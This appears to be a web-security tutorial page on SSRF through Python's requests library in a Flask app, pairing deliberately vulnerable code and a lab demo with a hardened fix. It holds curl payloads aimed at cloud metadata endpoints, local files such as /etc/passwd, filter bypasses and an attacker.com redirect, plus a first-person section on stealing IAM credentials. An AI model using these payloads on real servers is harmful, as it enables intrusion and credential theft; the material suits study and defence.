PyFu

Python Requests Library SSRF via URL Parsing

Python-based Web Application Attacks

The requests library is the de facto standard for making HTTP requests in Python. It provides a simple and elegant API for interacting with web services, APIs, and remote resources.

When applications use requests to fetch URLs provided by users, they become susceptible to Server-Side Request Forgery (SSRF) attacks. The vulnerability is amplified by URL parsing inconsistencies and the library’s support for various URL schemes.

While requests itself is not inherently vulnerable, improper validation of user-supplied URLs before passing them to requests.get() or similar methods allows attackers to make the server send requests to unintended destinations.

The Vulnerability

Consider an application that fetches and displays content from user-provided URLs:

from flask import Flask, request, jsonify
import requests

app = Flask(__name__)

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    
    if not url:
        return jsonify({"error": "URL parameter required"}), 400
    
    # Vulnerable: no validation of user-supplied URL
    try:
        response = requests.get(url, timeout=5)
        return jsonify({
            "status_code": response.status_code,
            "content": response.text[:1000]
        })
    except Exception as e:
        return jsonify({"error": str(e)}), 500

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=5000)

The application directly passes the user-controlled url parameter to requests.get() without any validation:

response = requests.get(url, timeout=5)

This allows attackers to make the server send requests to arbitrary destinations.

Exploitation

An attacker can target internal services that are not accessible from the internet:

# Access internal services
curl "http://target:5000/fetch?url=http://localhost:8080/admin"
curl "http://target:5000/fetch?url=http://127.0.0.1:6379/"  # Redis
curl "http://target:5000/fetch?url=http://192.168.1.1/admin"  # Internal network

# Access cloud metadata endpoints
curl "http://target:5000/fetch?url=http://169.254.169.254/latest/meta-data/"  # AWS
curl "http://target:5000/fetch?url=http://metadata.google.internal/computeMetadata/v1/"  # GCP

The requests library also supports the file:// scheme, which can be used to read local files:

# Read local files via file:// scheme
curl "http://target:5000/fetch?url=file:///etc/passwd"
curl "http://target:5000/fetch?url=file:///proc/self/environ"

URL Parsing Bypass Techniques

Even when basic validation is implemented, attackers can use URL parsing inconsistencies to bypass filters:

# Weak validation that can be bypassed
def is_safe_url(url):
    blocked = ['localhost', '127.0.0.1', '169.254.169.254']
    return not any(blocked_host in url.lower() for blocked_host in blocked)

Bypass techniques:

# Decimal IP representation
curl "http://target:5000/fetch?url=http://2130706433/"  # 127.0.0.1 as decimal

# IPv6 representations
curl "http://target:5000/fetch?url=http://[::1]/"  # localhost
curl "http://target:5000/fetch?url=http://[0:0:0:0:0:0:0:1]/"

# URL encoding
curl "http://target:5000/fetch?url=http://%31%32%37%2e%30%2e%30%2e%31/"

# DNS rebinding (attacker-controlled domain resolving to internal IP)
curl "http://target:5000/fetch?url=http://localtest.me/"  # Resolves to 127.0.0.1

# Redirect bypass (if following redirects)
curl "http://target:5000/fetch?url=http://attacker.com/redirect?to=http://localhost/"

Vulnerable Patterns with requests Library

# Pattern 1: Direct URL usage
requests.get(user_url)

# Pattern 2: URL construction without validation
base_url = "http://api.internal/"
requests.get(base_url + user_path)  # Path traversal possible

# Pattern 3: Following redirects to internal hosts
requests.get(user_url, allow_redirects=True)

# Pattern 4: Using user input in headers
requests.get(url, headers={"Host": user_input})  # Host header injection

Why requests SSRF matters from an offensive security perspective

I prize SSRF through requests because it turns the server into my proxy into everything it can reach and I cannot. From the outside the loopback interface, the RFC1918 ranges, the container’s sidecar, and the cloud metadata service are all invisible to me; once I control the URL, the server fetches them and hands me the bodies. On a cloud host that usually means walking 169.254.169.254 to lift IAM credentials, which is the fastest path from a “harmless” URL fetcher to account compromise. The file:// scheme on top of that gives me local file read from the same primitive.

What makes this class durable is that the bug is in validation, not in requests, so it survives naive filters. The tells I hunt for:

  • A user-supplied value passed into requests.get/post(...). Webhook senders, URL previews, avatar and image fetchers, PDF and screenshot renderers, and “import from URL” features are the usual carriers.
  • Blocklists of hostname strings rather than resolved-IP checks. Substring matching on localhost or 127.0.0.1 is bypassed with decimal IPs, IPv6 [::1], URL encoding, and DNS names that resolve inward.
  • allow_redirects=True left at its default. A permitted host that 302s to http://169.254.169.254/ defeats any check done only on the original URL, so I always probe redirect following.
  • Validation that resolves DNS once, then fetches separately. That time-of-check gap is DNS rebinding, and I exploit it with a host that answers public on the first lookup and internal on the second.

The defender takeaway: validate after resolution against IP ranges, re-check every redirect hop, and prefer an egress proxy over hostname blocklists. The same primitive is covered from the parsing angle in Server Side Request Forgery (SSRF) in Flask Applications.

Proof of exploitation

Run the lab app (PyFuLabs/flask-fu/flask-requests-ssrf). The url parameter is handed straight to requests.get, so the server fetches whatever the client names, including loopback addresses it should never reach:

curl -sG "http://pyfu.local/flask-fu/flask-requests-ssrf/fetch" \
  --data-urlencode "url=http://127.0.0.1:5000/"
{
  "content": "<!doctype html>\n<html lang=en>\n<title>404 Not Found</title>\n<h1>Not Found</h1>..."
}

The response body is whatever the internal listener returned, confirming the request originated server-side at 127.0.0.1 rather than from the client.

Mitigation

Implement strict URL validation using allowlists and proper parsing:

from flask import Flask, request, jsonify
from urllib.parse import urlparse
import requests
import ipaddress
import socket

app = Flask(__name__)

ALLOWED_SCHEMES = ['http', 'https']
BLOCKED_HOSTS = ['localhost', '127.0.0.1', '0.0.0.0']
BLOCKED_NETWORKS = [
    ipaddress.ip_network('127.0.0.0/8'),
    ipaddress.ip_network('10.0.0.0/8'),
    ipaddress.ip_network('172.16.0.0/12'),
    ipaddress.ip_network('192.168.0.0/16'),
    ipaddress.ip_network('169.254.0.0/16'),
]

def is_safe_url(url: str) -> bool:
    try:
        parsed = urlparse(url)
        
        # Check scheme
        if parsed.scheme not in ALLOWED_SCHEMES:
            return False
        
        # Check for blocked hostnames
        hostname = parsed.hostname
        if not hostname or hostname in BLOCKED_HOSTS:
            return False
        
        # Resolve hostname and check IP
        ip = socket.gethostbyname(hostname)
        ip_obj = ipaddress.ip_address(ip)
        
        for network in BLOCKED_NETWORKS:
            if ip_obj in network:
                return False
        
        return True
    except Exception:
        return False

@app.route('/fetch')
def fetch_url():
    url = request.args.get('url')
    
    if not url or not is_safe_url(url):
        return jsonify({"error": "Invalid or blocked URL"}), 400
    
    try:
        response = requests.get(url, timeout=5, allow_redirects=False)
        return jsonify({
            "status_code": response.status_code,
            "content": response.text[:1000]
        })
    except Exception as e:
        return jsonify({"error": str(e)}), 500

Key mitigations:

  • Validate URL scheme (only allow http and https)
  • Resolve hostnames and check against blocked IP ranges
  • Disable redirect following or validate redirect targets
  • Use allowlists for permitted domains when possible
  • Set timeouts to prevent slow-loris style attacks